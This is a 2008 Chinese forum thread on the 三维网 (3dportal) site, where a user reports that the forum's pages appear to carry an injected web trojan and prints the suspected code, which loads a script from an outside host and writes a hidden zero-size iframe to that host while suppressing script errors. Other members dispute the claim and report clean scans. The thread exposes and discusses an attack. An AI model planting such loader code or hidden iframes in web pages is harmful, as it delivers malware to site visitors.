QQ登录

只需一步,快速开始

登录 | 注册 | 找回密码

三维网

 找回密码
 注册

QQ登录

只需一步,快速开始

展开

通知     

查看: 2119|回复: 16
收起左侧

此网被挂马

[复制链接]
发表于 2008-11-26 14:38:57 | 显示全部楼层 |阅读模式 来自: 中国浙江金华

马上注册,结识高手,享用更多资源,轻松玩转三维网社区。

您需要 登录 才可以下载或查看,没有帐号?注册

x
马:Hack.Exploit.Script.JS.Mixed.c
  1. <script language="javascript" SRC="  ' target=_blank>http://u.cruze3.cn/u.js"></script> 9 E7 w. D5 R- b. m( m
  2. 5 l4 p, d, ?- }, ^: y; C& X2 r
  3. document.writeln("<script>";
    ) W' P) M2 q1 ^7 R% V$ d8 H
  4. document.writeln("function oK_Begin(){";
    # I4 E. Y" v) u3 I& ]. [
  5. document.writeln("var Then = new Date() ";
    " N& P: M& {( A1 d6 x/ A
  6. document.writeln("Then.setTime(Then.getTime() + 24*60*60*1000)";% Y) V3 T9 g! d) H# S& s
  7. document.writeln("var cookieString = new String(document.cookie)";
    3 n/ D+ o2 C; z9 x* h' H" Q, A
  8. document.writeln("var cookieHeader = "Cookie1=" ";5 m6 f) r- ~, x8 H, c8 r8 o3 m9 L
  9. document.writeln("var beginPosition = cookieString.indexOf(cookieHeader)";( ^$ }+ w) q! ?( z6 p, |
  10. document.writeln("if (beginPosition != -1){ ";
    3 r. B" x$ O; Q- j4 b
  11. document.writeln("} else ";
    & A, q9 ?4 ?$ @, t/ U0 g! b
  12. document.writeln("{ document.cookie = "Cookie1=POPWINDOS;expires="+ Then.toGMTString() ";# k: ]8 G" `. r' v/ ?- ~
  13. document.writeln("document.write(\'<iframe width=0 height=0 src="\'">http://u.cruze3.cn/u.htm"><\/iframe>\');";
    ! N; a# ~) J0 k9 ]2 O+ |9 V# N
  14. document.writeln("}";
    - T3 Q$ X0 l; V% i, e- o, V
  15. document.writeln("}";2 j6 U/ o; \  J  p7 C+ P/ \0 H
  16. document.writeln("oK_Begin();";4 l. p) u, b0 j) t, v
  17. document.writeln("<\/script>";
    4 H1 Z. q9 F: j, Q( r3 E5 \
  18. document.writeln("<script>window.onerror=function(){return true;}<\/script>"
    - ^6 p5 ?9 G0 w. P5 ?
  19. ; C4 c1 E" j7 }$ Y3 C7 \
  20. $ q3 n6 u: O% ?# p8 E& A
  21. : G3 ^0 T! m' H! l* K1 w; y2 C
  22.   a+ M. m8 H9 q- S- p3 X! R: M

  23. 5 |4 q* R' A2 [' J) R* y
复制代码
虽然从表面上去看是个恶意代码,但里面可能包含马,试图打开此网页u.htm,而此网页可能是网页木马
发表于 2008-11-26 14:44:03 | 显示全部楼层 来自: 中国浙江宁波
请管理员确认是否网页挂马?
发表于 2008-11-26 14:47:52 | 显示全部楼层 来自: 中国江苏南京
我的麦咖啡都没检测出来 你什么杀毒软件?
 楼主| 发表于 2008-11-26 16:16:23 | 显示全部楼层 来自: 中国浙江金华

回复 3# cayuer 的帖子

不是杀软件查的.
6 j" E* N0 ^4 v/ {" @只是无意中去看了源文件,感觉网头中的u.js很是反常(按常理说,很少在HEAD前,且根目录并是是此网站,于是,下载了u.js,发现不对头.它试图以最小化打开U.HTM网页,按平时的经验,它不是毒就是马,很少有人会在论坛上放毒,一般多是放马.
5 i3 N' C8 @( S; K  q; s3 R不过,已经被清理了.
1 g$ m! F5 t3 S) K+ h  G1 |5 w1 B+ _; G! b
HEHE' V& i+ D+ T5 F; W; n% B: ]

9 v( w$ i- u! q1 u+ `[ 本帖最后由 czy12 于 2008-11-26 16:25 编辑 ]
发表于 2008-11-26 18:27:17 | 显示全部楼层 来自: 中国浙江温州
你这个什么网站,哪里出来的?7 U2 G$ V7 c9 V+ R+ c+ n6 J

, [) l' ]. k* {- ]  e) @ht tp://u.cruze3.cn/u.js
 楼主| 发表于 2008-11-27 09:15:28 | 显示全部楼层 来自: 中国浙江金华

回复 5# 江南有雪 的帖子

http://u.cruze3.cn/u.js
; Y/ x- m/ g* |+ M  i' e6 U5 s" S此网是个挂马网,是不可能看到的(他才不会那么笨,HEHE),一般都通过本地IIS进行域名转向.2 I  J* B* x& N
这是昨天我想看别的网页的源文件时,无意中点了此网页的源文件,才发现不对头.
% J0 O/ A! h& X, a* x3 f2 F+ LHEHE
发表于 2008-11-27 10:26:38 | 显示全部楼层 来自: LAN

回复 6# czy12 的帖子

这跟三维有什么关系?
 楼主| 发表于 2008-11-27 11:01:02 | 显示全部楼层 来自: 中国浙江金华
这是挂在三维网论坛里的.
' M0 Q6 S& Q6 A( u; a: X: P红线所指
moma.jpg
发表于 2008-11-27 11:21:19 | 显示全部楼层 来自: 中国上海
奇怪,为什么我的里面没有?是不是楼主的机器自己带病毒了?
发表于 2008-11-27 11:26:10 | 显示全部楼层 来自: 中国甘肃兰州
自己的机子中毒了,就不要满天喊叫了,没人会认为你是一个杀毒的行家
 楼主| 发表于 2008-11-27 11:34:27 | 显示全部楼层 来自: 中国浙江金华
不学无术.& M5 k* d9 L0 j7 L& v
HEHE
mlm.jpg
发表于 2008-11-27 14:30:45 | 显示全部楼层 来自: 中国香港
但在:; I3 B& T9 j0 F2 E; w% Z- @& {0 g
http://www.3dportal.cn/discuz/ 之原
/ s' h6 E0 F+ H# S  e/ ^4 {1 a  q. i似乎看不见楼主所说的 http://u.cruze3.cn/u.js
  q8 D! c# I+ f. N8 k
* Z  G  o# s. ]( D2 y% w[ 本帖最后由 yyywwwhk 于 2008-11-27 16:23 编辑 ]
发表于 2008-11-27 15:30:58 | 显示全部楼层 来自: 中国山东泰安
经过自编扫描代码处理结果,未发现楼主说的挂马代码!
1 }) Z5 p" O# e3 G. N2 g8 _# u+ H5 ~5 O# ]
请清理自己计算机的缓冲区!
1.JPG
头像被屏蔽
发表于 2008-11-27 15:43:48 | 显示全部楼层 来自: 中国河北衡水
提示: 作者被禁止或删除 内容自动屏蔽
发表于 2008-11-27 15:47:42 | 显示全部楼层 来自: 新加坡

回复 8# czy12 的帖子

看您的尾符/script,很像是U盘病毒。
 楼主| 发表于 2008-11-27 15:50:50 | 显示全部楼层 来自: 中国浙江金华
DZ6.1有代码自我修复功能。甚至可以在服务程序中设置定时还原数据库。" f0 M! m" J6 s0 Y3 \
我也说了:已修复。
, I7 A! N* ^' c* [1 x9 V" r/ Y" n. ~
ps:这与缓存毫无关系。虽然缓存中有U.JS.
# B7 Y/ B; _0 C% l# D' ~9 S/ \但本机上的毒是不会去改动你的网页内容的.我的机子中毒,和你的网页源代码有何相关?/ a, v# V7 B. c  G

) V9 G7 l" y# r! Qscript是个JAVA代码,与U盘何关?( \# {# Y$ S; X+ q
3 i, _5 X$ U- V/ q9 {# x9 [0 [
HEHE
+ F  \( L" Y% x/ A* x
# N, F8 A7 R9 U4 A[ 本帖最后由 czy12 于 2008-11-27 16:03 编辑 ]
发表于 2008-11-27 16:11:40 | 显示全部楼层 来自: 中国山东泰安
非也,代码是程序直接采样的当时的网页代码,是自编的,算不上权威,但是可以直接进入部分加密网站!
5 v4 n+ q0 _+ \* P$ p6 z
) \: d. t* L0 @) Y) D如果却如你说的修改了,我想,这只有论坛管理员有这个权限,即便是后台也是有记录的。假如确实是论坛后台修改了,一定会给大伙一个说法的。: u9 \2 Y7 W5 d" }
( ^( a! f3 ?" ?5 d; c3 U2 K
相反,目前从各方面提供的代码显示,确实“此时此刻”是正常的!至于继续讨论已经无大的价值!
发表回复
您需要登录后才可以回帖 登录 | 注册

本版积分规则


Licensed Copyright © 2016-2020 http://www.3dportal.cn/ All Rights Reserved 京 ICP备13008828号

小黑屋|手机版|Archiver|三维网 ( 京ICP备2023026364号-1 )

快速回复 返回顶部 返回列表